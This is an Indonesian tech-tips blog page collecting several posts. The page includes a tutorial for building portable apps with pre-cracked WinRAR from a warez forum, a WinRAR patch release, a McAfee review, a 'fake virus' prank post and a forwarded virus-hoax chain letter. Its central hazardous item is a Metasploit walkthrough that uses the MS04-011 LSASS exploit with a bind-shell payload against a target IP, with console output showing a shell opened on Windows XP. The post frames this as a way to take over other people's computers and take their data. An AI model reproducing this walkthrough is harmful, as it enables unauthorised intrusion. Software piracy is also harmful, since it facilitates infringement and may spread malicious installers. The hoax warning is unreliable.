' Tips Trik Komputer Dan Internet

Create portable apps using WinRar

Create portable apps using WinRar (Detailed)

In this tut i will show u how to make portable app using winrar

Winrar pre-cracked
Download : http://rapidshare.com/files/179091884/Winrar_3.80.zip

Icon converter plus

Download: http://rapidshare.com/files/19822360/Icon_Converter_Plus.Portable.MZ.rar

Password: MZ


Lets start!


Quote: This Tutorial is officially made by me for Warez-bb
We will use FireFox in this tut.
before starting using winrar u must delete files like uninstall logs and other unwanted files you like
test the application after deleting the files...

Here we go...!!

1.We will copy FireFox from its directory to desktop.

2.Extract the main app icon by using Icon Converter Plus (if u don't want icon for your portable app, so you can skip this step)

launch icon converter plus then follow as shown below



3.Go to your copied mozilla firefox folder
then select all files and do as shown below


right click and click add to archive
4.Enter settings in winrar as shown below:





Select your icon which you saved from icon converter plus


5.Click ok

READ MORE - Create portable apps using WinRar

Cara Membuat Office 2003 bisa membaca File Office 2007

Bagaimana Caranya Agar Office 2007 bisa terbaca di 2003?

Caranya sangat gampang sekali, dan ini semua sudah dipikirkan oleh Microsoft, tinggal datang saja ke situsnya kita bisa mendownload file FORMAT CONVERTER nya yang berukuran 27,5 Mb. Untuk mempermudah bisa langsung lewat online....

READ MORE - Cara Membuat Office 2003 bisa membaca File Office 2007

Cara Memakai Metasploit

Metasploit merupakan program yang sangat bagus untuk menguasai komputer orang lain lewat jaringan koneksi komputer.

Dengan metasploit kita bisa masuk dan mengambil apapun isi dari komputer target.PErnah jadi korban masalahnya...id sama password hilang tinggal pakai metasploit dan katanya lagi dengan metasploit kita juga bisa matiin komputer orang dr jarak jauh juga..Sebelumnya saya mohon maaf kalau topik aku ini kurang baik,atau udah basi,atau ngak jelas.

Sebelumnya makasih buat situs hackers-center.org untuk tutorialnya.

1.buka frameworknya
. trus masuk ke console (ctrl+o )

. liat smua exploit dengan perintah

msf > show exploits

2.load modul exploit (aku dikasih twnya suruh pake exploit lsass)

msf > use windows/smb/ms04_011_lsass

3.Tentukan sistem operasi target(nie contoh klo target pake xp)

msf exploit(ms04_011_lsass) > set target 2

target => 2

3.Tampilin payloadnya apa aja yg ada..

msf exploit(ms04_011_lsass) > show payloads

4. pilih payload generic/shell_bind_tcp

msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp

payload => generic/shell_bind_tcp

5.tentuin ip target (misal ip nya xxxxxxxxxx)

msf exploit(ms04_011_lsass) > set RHOST xxxxxxxxxx
RHOST => xxxxxxxxxx

6.sekarang tinggal jalanin perintah exploit...

msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Command shell session 3 opened ( ->
[*] The DCERPC service did not reply to our request

7.Selanjutnya qta tampilin...isi session kita

msf exploit(ms04_011_lsass) > sessions -l

Active sessions

Id Description Tunnel
-- ----------- ------
3 Command shell ->

8. terus kita masuk ke session 3 tersebut, untuk masuk ke konsol....

msf exploit(ms04_011_lsass) > sessions -i 3

[*] Starting interaction with 3...

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.


oh ya kita tidak bisa masuk komputer target kalau tidak ada celahnya dan biar kita tahu komputer target ada celahnya atau tidak,kita scan dulu pakai nmmap. Maklum pelupa.nmmapnya dah ada di framework seri 3.1 berhubung aku punya nya yg seri 3.0 tidak ada nmmap nya ya maaf kalau tidak aku upload.

Klik disini untuK metasploit 3 GUI (Download)

READ MORE - Cara Memakai Metasploit

WinRAR 3.90 + Patch

1. WinRAR version for Windows x64 is available. If you use
Windows x64, it is strongly recommended to install 64 bit
WinRAR version. It provides a higher performance and better
shell integration than 32 bit version.

2. RAR compression speed is improved for multi-core
and multi-CPU systems. This improvement is most noticeable
in Windows Vista and Windows 7 operating systems.

3. "Remove duplicate folders from extraction path" option
in "Settings/Compression" dialog is replaced by more universal
"Remove redundant folders from extraction path" option.
This option will eliminate redundant archive name based folders
from extraction path if you unpack an archive with
"Extract to DestName\" context menu command and if archive
root folder contains only one folder and no files.

4. Changes in "Extraction path and options" dialog:

a) "New folder" button creates a new subfolder in currently
selected folder;

b) F2 key renames a selected folder in the folders tree;

c) F5 key updated the tree pane contents;

d) Del key removes a selected folder in the folders tree.

5. You can enable "Show seconds" option in "Settings/File list"
dialog if you wish to see seconds in file dates in file list
in WinRAR shell.

6. "Where to check for SFX archives" options group
in "Settings/Integration/Context menus items" dialog lets
you to control processing of SFX archives in context menus.
For example, if you frequently right click ".exe" files
on slow network disks, you can turn off "Network disks" options
to minimize the delay before displaying the context menu.

7. If you sort files by name in the file list in WinRAR shell,
WinRAR will use the new logical file name sorting,
same as in Windows Explorer, considering digits in file names
by their numerical value. So files will be sorted as
1.txt, 2.txt, 10.txt instead of previous 1.txt, 10.txt, 2.txt.
This new sort behavior is available in Windows XP Service Pack 2
and newer.

8. Ctrl+W key combination can be used to close the main WinRAR window
also as WinRAR viewer windows. "View as Windows text" shortcut
in WinRAR viewer changed from Ctrl+W to Ctrl+I.

9. New command line switch -r- disables recursion completely.
So 'rar a -r- arc dirname' command will add only the empty
dirname folder and ignore its contents. By default, if dirname
does not include wildcards, RAR adds its contents even if
-r switch is not specified.

10. If used when extracting, the new command line switch -ai forces
RAR to ignore file attributes. When using this switch,
extracted files will always have attributes assigned by
operating system to a newly created file by default.

11. If output file name is not specified in "cw" command, console RAR
will send comment data to stdout.

12. When compressing stdin data with -si[name] switch, RAR sets
modification time of archived entry to current system time.
Previous RAR versions did not fill this field, resulting in
meaningless modification time for stdin.

13. Message displayed when you place the mouse cursor on WinRAR
tray icon includes the archive name now. Previously only
time left and total percent were displayed for archiving operations.

14. Bugs fixed:

a) WinRAR could fail to open tar or tar.gz archive if such archive
contained a file larger than 8 GB;

b) WinRAR context menu did not work properly in Windows 7 beta
if icons in context menus were enabled and user clicked
a file inside of Windows 7 Library folder;

c) previous WinRAR versions failed to rename files having 5 or more
continuous spaces in the name. WinRAR shell does not display
such spaces for safety reasons, because they can hide an actual
file extension. But this security measure prevented the rename
command to work properly.

Click Here To Download
READ MORE - WinRAR 3.90 + Patch

Mcafee total protection 2009

McAfee Total Protection is the penultimate security product from this longtime security vendor, offering a complete suite of security and system-maintenance tools, including various wireless security tools absent from Microsoft's Windows Live OneCare and Symantec Norton 360. Certainly McAfee Total Protection provides the most security and performance features, however it is hobbled by some design and program flaws. It feels like a grab bag of security and performance tools without any clear focus, which will likely frustrate the average user. While it bests Windows Live OneCare, McAfee Total Protection could learn a few things from Norton 360.

Setup and Interface
We downloaded and installed McAfee Total Protection without a problem, although we thought the process was needlessly confusing. From the McAfee.com site, we entered our ID and password, then downloaded the Download Manager onto our desktop. Despite choosing McAfee Total Protection from the McAfee.com site, we were again presented with a list of options and ended up downloading the McAfee VirusScan Plus application instead of the McAfee Total Protection application. If you are not paying attention, you might download the wrong application. Once we downloaded the correct application, however, the installation process was smooth.

McAfee Total Protection requires a mere 175MB, almost half of what Norton 360 requires, and nearly one quarter the size of Windows Live OneCare. Like the others, McAfee Total Protection requires 256MB of RAM. Only McAfee Total Protection works on Windows 2000 through Windows Vista, while both Norton 360 and Windows Live OneCare work on only Windows XP and Windows Vista. Like the other super security suites, the price for McAfee Total Protection includes installation on up to three different PCs (for example, two desktops and a laptop).

click here to download
READ MORE - Mcafee total protection 2009

Virus palsu

Temen - teman sekalian saya ingin berbagi dengan kalian semua, karena ada sebagian orang yang membuat virus palsu untuk ngerjain orang lain.

Caranya gini....
1. Matiin DF kalo disitu ada Df...Trus restart....
2. Masuk ke notepad....
3. Ketikkan source code ini...
Source nya sengaja ga g masukin ke kategori code...
Cos ntar g susah nandainnya....

Mau download sourcenya: download disini

Sbenernya smwa terserah jg c...
Cm ini g ngasi yg instan aja....
virus palsu ini bisa jalan kalo web browsernya " FF n IE
READ MORE - Virus palsu

Virus komputer paling berbahaya baru ditemukan

Sebuah virus baru sudah ditemukan, dan digolongkan oleh Microsoft
sebagai yang paling merusak! Virus itu baru ditemukan oleh McAfee, dan belum ditemukan vaksin untuk mengalahkannya.

Virus ini merusak Zero dari Sektor hard disc, yang menyimpan fungsi
informasi-informasi terpenting. Virus ini berjalan sebagai berikut:

*secara otomatis virus ini akan terkirim ke semua nama dalam daftar
alamat anda dengan judul “Sebuah Kartu Untuk Anda”(Une Carte Pour Vous,
atau A Card For You);

*begitu kartu virtual itu terbuka, virus itu akan membekukan komputer
sehingga penggunanya harus memulainya kembali; kalau anda menekan
CTRL+ALT+DEL atau perintah untuk restart, virus itu akan merusak Zero
dari Sektor Boot hard disk, sehingga hard disk akan rusak secara

Menurut CNN, virus itu dalam beberapa jam sudah menimbulkan kepanikan
di New York . Peringatan ini telah diterima oleh pegawai Microsoft

Jangan membuka e-mail dengan judul “Sebuah kartu virtual untuk Anda” (
Une Carte Virtuelle Pour Vous atau A Virtual Card For You ).
Kirimkan pesan ini kepada semua teman anda. Saya rasa bahwa sebagian
besar orang, seperti saya sendiri, lebih suka mendapat peringatan ini
25 kali daripada tidak sama sekali.

Jangan terima kontak “pti_bout_de_ chou @hotmail.com” . Ini virus yang
akan memformat komputer anda. Kirimkan pesan ini ke semua orang yang
ada di dalam daftar alamat anda. Kalau anda tidak melakukannya dan
salah seorang teman anda memasukkannya dalam daftar alamatnya, komputer
anda juga akan terkena..

Benar atau tidaknya email ini belum diketahui. Tapi sebagai pengguna komputer kita harus waspada dan hati2. Memang tidak ada yang aman di dunia ini…. para penjahat bisa berbuat apa saja dimana saja dan dalam bentuk apa saja…namanya juga setan.

Credit by Logic Team
READ MORE - Virus komputer paling berbahaya baru ditemukan
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